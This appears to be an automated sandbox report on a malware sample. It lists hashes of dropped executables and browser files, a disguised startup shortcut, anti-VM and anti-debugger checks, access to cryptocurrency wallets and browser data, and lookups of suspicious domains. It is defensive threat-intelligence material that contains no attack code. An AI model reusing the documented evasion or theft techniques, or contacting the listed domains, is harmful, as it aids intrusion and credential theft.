| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
memory/4760-371-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1812-370-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1612-373-0x00000000008C0000-0x0000000000D7F000-memory.dmp
C:\Windows\Tasks\Test Task17.job
| MD5 | e98b04b624a464b1c29c568ce5c01d80 |
| SHA1 | 0e2dbfea3364a1fe6e0a71cc73a9c816badf8ebc |
| SHA256 | e1af114b172e3e860fffedc2dd9845bd9c55407915e2e3fa2178b93741e2f1ef |
| SHA512 | 3c62665d36228919f0af16328c1fe20a1f44f7bb15d6c20fe52ddb20f4c300516c10096830790fdf77abe6bc1c36308da1f5f3b7499bc9de1c346c61a7b2d45c |
memory/1612-376-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/2816-378-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/4912-380-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe
| MD5 | 5d153f73ce1b6a907cf87ddb04ba12b2 |
| SHA1 | bfda9ee8501ae0ca60f8e1803efea482085bf699 |
| SHA256 | 2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c |
| SHA512 | 0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102 |
memory/2644-396-0x00000000002D0000-0x0000000000F21000-memory.dmp
memory/4760-398-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1812-399-0x0000000000400000-0x0000000000840000-memory.dmp
memory/4760-400-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2816-402-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/4912-404-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe
| MD5 | 8538c195a09066478922511ea1a02edf |
| SHA1 | 15e8910df845d897b4bb163caef4c6112570855b |
| SHA256 | d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96 |
| SHA512 | 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c |
memory/1032-419-0x0000000000F50000-0x00000000013FB000-memory.dmp
memory/2644-420-0x00000000002D0000-0x0000000000F21000-memory.dmp
memory/2644-443-0x00000000002D0000-0x0000000000F21000-memory.dmp
C:\Users\Admin\Desktop\YCL.lnk
| MD5 | f63714e3ad1cc2dbf8465ca21b151566 |
| SHA1 | e294fcaedd5f255ae930ad78509e57001369a915 |
| SHA256 | 838cc8e53c2ff83ce4ec76dac7679b9a888cd7923b9f60ff9194cad29283da25 |
| SHA512 | 05e85a65ba2a618630fa850f53d555facd0ff3979376306b3a044b30f7524fd1cba3319a759b2044aedb1ac1e6127bab0ed27c141ea816c70b1143410ff375bf |
C:\Users\Admin\AppData\Local\Temp\BWee4D3AYfw9GE1K6DFDSwdJt\Y-Cleaner.exe
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
memory/2644-467-0x00000000002D0000-0x0000000000F21000-memory.dmp
memory/4624-466-0x0000000000400000-0x000000000042F000-memory.dmp
memory/1812-468-0x0000000000400000-0x0000000000840000-memory.dmp
memory/4912-470-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
memory/4912-471-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
memory/4760-473-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1032-475-0x0000000000F50000-0x00000000013FB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe
| MD5 | 2a48e7b047c5ff096c6dce52d4f26dbb |
| SHA1 | e0d61e10b27131b1c34ade44d1a2117afd2cf099 |
| SHA256 | 42642893c6a6af226aab5b2cce0875e7affebf7d1001146ddd90234d4c01492d |
| SHA512 | 75965d3aa7cda41ecc11f87b1ac2b12283d58650f5b96f2af560aff859ca74c0c0cb26dfc765b4d8318291d8f89fdbb338fb71ddf3f4b63389aedb5e2106165a |
memory/2456-496-0x0000000000AB0000-0x0000000000DC4000-memory.dmp
memory/2816-497-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/4912-499-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe
| MD5 | 338a31056b3b81d48a292a7bf9af67c7 |
| SHA1 | f5061e3583ba604b25e316f12fc58f40238d44b4 |
| SHA256 | cd1c085a07dc81e4305c2b9ee57e5c0433858c97cb20b1743cf44931c431ccea |
| SHA512 | 5bc7823cbd1ab6fa963df8f152d8b6de56af41159f3a736d147f1e5b4dcba3007319e2d2fb13e97f1e8b3cce3ab0d17e31d541be1ab53f8bd05a42316a940abc |
memory/4432-514-0x0000000000D50000-0x00000000013D7000-memory.dmp
memory/4432-518-0x0000000000D50000-0x00000000013D7000-memory.dmp
memory/4760-520-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2456-528-0x0000000000AB0000-0x0000000000DC4000-memory.dmp
memory/3816-525-0x0000000000F30000-0x00000000013EF000-memory.dmp
memory/2456-524-0x0000000000AB0000-0x0000000000DC4000-memory.dmp
memory/3816-530-0x0000000000F30000-0x00000000013EF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe
| MD5 | c0caf5a901b162b6792eab9697827b5d |
| SHA1 | d078ba4ad104c40bf5f2c8afda1cbdf4afc55a84 |
| SHA256 | 28c182baea1726c3e851405b13f130e02817099758abab86ca9cdc3607b9f89f |
| SHA512 | 3fba4eb7a2bc21fc24a6e29495e598efc5f208db030b13de8af43a392a93e3a920e4e8e4b68e10d4dc4a0e8779401ca738172ca9cba2ddc2246854c41a8a58a5 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\AlternateServices.bin
| MD5 | 81ee27532211182c34e9c0246a85b0da |
| SHA1 | 07843f9d9db85ea4d887818daf242599d37af358 |
| SHA256 | 4f8f022b76ac46855ab82930bd2e1882fa866336bf98993ecbba41c4b3a61a88 |
| SHA512 | b320052fd5dafeaa8a80e5cad7b4d9314c7b0d15161955bcdd23a247fd8921553d8b668449cb9dfde10bcc74f7b265db0653f883d2fc03bfd6e57b9a1dc2929d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\a1299b2b-d5c1-40fe-b2e5-e91f2d7e139b
| MD5 | bafa8b3ea120ee6a0e860799009fcf7e |
| SHA1 | 86b328433db67f6d38ca4a763a1f014c226e60a0 |
| SHA256 | 900f9ff0eaa5ab4a96a069a9b2689d1285bd250d6098740bc9f45f4f83549f3b |
| SHA512 | c2eec21a186504b899671bd3aa2b27e4d9f78c6e836b329fe2efe06bb4e8a51eaa64fc7b14a1543e04e115eef1642b7fd74e328fff4ed04c1344eff8b581f843 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 404002aafe8163f795edaf2cbe471b27 |
| SHA1 | 661f56ff4d3ecfa2ffa8fb6510c2169f6243d284 |
| SHA256 | a47aaeb46c580900d89949acf08c973fbec44a06e33db88fd57be3bae9a1e482 |
| SHA512 | 5e2d6a4885f16fda6c3d23cbd589941cb22be938c27eb9dcd715a650ff2de232fa001f942d9a6d28b2df8392037809f21992bd2f06a3eb385302be5943551ffa |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 2d38ae9732a366ebccdc6c2a67d88898 |
| SHA1 | cef963367e7ee5de5fdec8a545e6ccd72043ae4d |
| SHA256 | e1b5673474f3236cfa8d26802979d1570306c509d359336dbf49b1aeb3beb96b |
| SHA512 | 6283dd7be5c7bcf60a3e76e98519c7876fc48456b88cce09511640a307f6f5ee97762668d027cba39c7173feb20b67b8c6d793a6ec3c92ddd313a9a508baa303 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\d9d3bfe7-b788-415a-a9fe-99948fc4a8d9
| MD5 | 24e9911a2a15c19423d39916b27eab90 |
| SHA1 | 97ef9de317c35b69c804b46f9b26b12228338fb1 |
| SHA256 | f00a640a88c6bef7a914075287109e7583a1dd736de829fd3e25abe7d0e8e0f4 |
| SHA512 | dc04ca538f1e7b095519eb797a1ce50076734044f3cb660fdc0db14c5bbb6e7052ac2b91c68f57d1edccb592e8614ec12fa0d62e63758a699d0d6c97850cdf9c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\60c1d7d6-a364-4369-b78d-ad1a661f4b6b
| MD5 | 84c500c830911598ab5eee127e9f467d |
| SHA1 | 61846eede4ce7fe445097cb13f17cb12c43706de |
| SHA256 | 3dfdc57ac381a9d99f33203deafb77edf2eab4c4058f83df34c61e6d3de03995 |
| SHA512 | ce77ab6f0cb4a298a9a9e3b328e309d62dfedf8e7278271acc23d278fc93f333a856729b98f703af32dbbe89732a4eddb2bfff0a253d5fe1032d926b483c708b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk
| MD5 | 7ab39bc35195b01db0eb09e6452b70f7 |
| SHA1 | e10c2c3f3c293fc28250293f383076a31da948bb |
| SHA256 | 8eca63b166c7812902bfb6ff78a5874aee74cc2b7e7fcd096a3d2aae78b78160 |
| SHA512 | 5f880a2225e07333a6dd708fe2388350e3316cdb44f7445741cae2e9ff698c2957518a33ddfb429a35403c0da833dcb7b97d44d1234a2d33c0d8ecb2064d8a26 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 2c5e426ef34ae0ddb2b4ebdaa8184ae8 |
| SHA1 | 0e526a5326f68c9e8d1a6c7e8dbe70dd17daab95 |
| SHA256 | 40211d6623b8fd504f1b279afccc9bec90ae18bb4091a8c867adfb6437d9a5b8 |
| SHA512 | c388e9a8d1e4a8b7df6d13c9de8f8aeca7374112a97e65aefefa3f3f656cfd19504c6791eee31a9c317dd715c763bb3bfbb61c1ce2a126e60824a05f540a84f9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\AlternateServices.bin
| MD5 | f39d49c4f27e85ed0c82b9c6223aacdd |
| SHA1 | 438f1abe9f9ca52f9319644fbcd33075ca09e636 |
| SHA256 | fc6291f43501d87d078966f98a9f459ab1e903f0d04164a78dc0568fdd2321de |
| SHA512 | 08f97868029365416824a99fde1df74abccd5a6e250dd22abdeac8cf93fd1e978e6de8ce1534e4410c7e1563d71491dc96e4a07a2834cdc32f0b2565057ec4bc |
C:\Users\Admin\AppData\Local\Temp\10107740101\91ff33b7b2.exe
| MD5 | 8043b20e32ff2f0c75e9a3eed0c4bf07 |
| SHA1 | 5464aa1bc2a91c64cd8c4cbbb6970e8189c158a3 |
| SHA256 | 69a487512dfb97f08d068d0f9dd3924f42bef46bddd79112cb206b00fc16713e |
| SHA512 | 35639c6aad3dd25f606ca72ad108f774b083fa62677772242d357d59add9bba1dc85532d58ae67277d90c04dd4a5189548ca331fe93ee086c31cacbf11b8a18c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\prefs.js
| MD5 | dfb0400d1a77ffb15cde456b2cdeec0f |
| SHA1 | fd4af4a023e325dcb5c4c5360805aa1c2217eeda |
| SHA256 | 1007d8d31584a29169e6704d524ca0c388692ebe64ca720d7a9296b42b32cb6a |
| SHA512 | a1fe02e61d35a1d8fe5c8e2c214808c1f84c96f986bd52717163a4dad8899a7878257d92cc4f71166872a0d52149251f8cb53c7392c8a9b28a6e364cfe7fae25 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\prefs-1.js
| MD5 | f1a33e2276c5393129593c774f09be6f |
| SHA1 | 56d742a549f8ac2e6c135c9d8dba15360a3983c3 |
| SHA256 | a771646130c498cce69f92d8b1aaf1219a6e404f2927ddd650e46b08271c023c |
| SHA512 | 8076340769a114a1afccf202e3c420f88c862af61f5345fcaeb05d5907f88c0a97f469bebcda206888ee2f3cbe8ff35fdb3dc7c61bf5cbb5793e90a0b2053acc |
memory/5292-895-0x0000000000CB0000-0x0000000001108000-memory.dmp
memory/5292-907-0x0000000000CB0000-0x0000000001108000-memory.dmp
memory/5292-908-0x0000000000CB0000-0x0000000001108000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
| MD5 | 2bb133c52b30e2b6b3608fdc5e7d7a22 |
| SHA1 | fcb19512b31d9ece1bbe637fe18f8caf257f0a00 |
| SHA256 | b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630 |
| SHA512 | 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f |
memory/5292-983-0x0000000000CB0000-0x0000000001108000-memory.dmp
memory/5292-999-0x0000000000CB0000-0x0000000001108000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
| MD5 | 6006ae409307acc35ca6d0926b0f8685 |
| SHA1 | abd6c5a44730270ae9f2fce698c0f5d2594eac2f |
| SHA256 | a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b |
| SHA512 | b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718 |
memory/6108-1038-0x0000000000DF0000-0x000000000128B000-memory.dmp
memory/5940-1039-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/5940-1052-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/5836-1061-0x0000023D2FB90000-0x0000023D2FB98000-memory.dmp
memory/6108-1070-0x0000000000DF0000-0x000000000128B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
| MD5 | 641525fe17d5e9d483988eff400ad129 |
| SHA1 | 8104fa08cfcc9066df3d16bfa1ebe119668c9097 |
| SHA256 | 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a |
| SHA512 | ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e |
memory/4300-1087-0x0000000000740000-0x00000000007B0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 6b297d474a7a11e5cf3b52665631b697 |
| SHA1 | cf0d1d7692bdfb3a9d7082f20be8750e39627fd0 |
| SHA256 | c0b047a7c0afe16a7f886284e0e5b4ae6dffb64db39f014c7a92671f73e521bc |
| SHA512 | e29ca1eb19f09b051b2b33078ef88416e563befa26bab92d6986baa68bd084a00e38f2a6f3bdd1b2d2ae5a3f67421004009b3a5f108112144631f841fbd805a6 |
C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
| MD5 | d39df45e0030e02f7e5035386244a523 |
| SHA1 | 9ae72545a0b6004cdab34f56031dc1c8aa146cc9 |
| SHA256 | df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2 |
| SHA512 | 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64 |
memory/4996-1138-0x0000023AFB8D0000-0x0000023AFB8E2000-memory.dmp
memory/4996-1139-0x0000023AFBC70000-0x0000023AFBC80000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\prefs-1.js
| MD5 | d9bea1903f5e177cdc18bbcc1dab0775 |
| SHA1 | e653e1205fdd9b3c01606f6ed62c1e80d84a0c45 |
| SHA256 | 7ff37b4a51be372acf0e650bd51b71a851b593836562194ed9346decb4fb1f58 |
| SHA512 | debe8f0385e2b471c9abdd59c5da8b8fc0a28864fee0aed4aad394087f8796b2f3f9e45959c0d20d43eb05ceb0f5a90d2eb4324e304dbccc52c46f3ddf76f1d1 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\AlternateServices.bin
| MD5 | bad4b2be63239af9c7e2d80768239001 |
| SHA1 | 00c157d24e3aca881763f11eab3a0b3d5e239d0f |
| SHA256 | 93847ba39ad58bc09fa31c8ceb83631395e97e81360744ef6fd7ae07c2fb367c |
| SHA512 | 2b925de703b41d6630785fb56d63e9b02b70e8944e76d04439d6673d71c5e3928b0d9f0dda32abab00e566eb98beb83ee6dbb1549108fe0a4df1ae94065a3003 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
| MD5 | b60779fb424958088a559fdfd6f535c2 |
| SHA1 | bcea427b20d2f55c6372772668c1d6818c7328c9 |
| SHA256 | 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221 |
| SHA512 | c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f |
memory/6740-1353-0x0000000000BB0000-0x0000000000C10000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\8PKTZ3BC\microsoft.windows[1].xml
| MD5 | 77cc82955ce893463f41601027f87ac2 |
| SHA1 | 735452540cbaec9e70d0e63c0d8433a3ea230678 |
| SHA256 | 9be9016f70328b4742f54c3a3bb7387bccd76210084593015a42972593d48a34 |
| SHA512 | 0b060b863f9ec90c3c9e3bac05111f0a793c570b443af6a982df027d13f4377c4b50662c7cbd7e1862fdd985410a08895b45eb80d86a95a950bdc7a4ba727ac8 |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-05 23:11
Reported
2025-03-05 23:14
Platform
win7-20250207-en
Max time kernel
121s
Max time network
125s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
Browser Information Discovery
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 272 wrote to memory of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 272 wrote to memory of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 272 wrote to memory of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 272 wrote to memory of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe
"C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 272 -s 1216
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
Files
memory/272-0-0x0000000000FE0000-0x0000000001307000-memory.dmp
memory/272-1-0x0000000076ED0000-0x0000000076ED2000-memory.dmp
memory/272-2-0x0000000000FE1000-0x0000000001041000-memory.dmp
memory/272-4-0x0000000000FE0000-0x0000000001307000-memory.dmp
memory/272-3-0x0000000000FE0000-0x0000000001307000-memory.dmp
memory/272-5-0x0000000000FE0000-0x0000000001307000-memory.dmp
memory/272-6-0x0000000000FE0000-0x0000000001307000-memory.dmp
memory/272-7-0x0000000000FE1000-0x0000000001041000-memory.dmp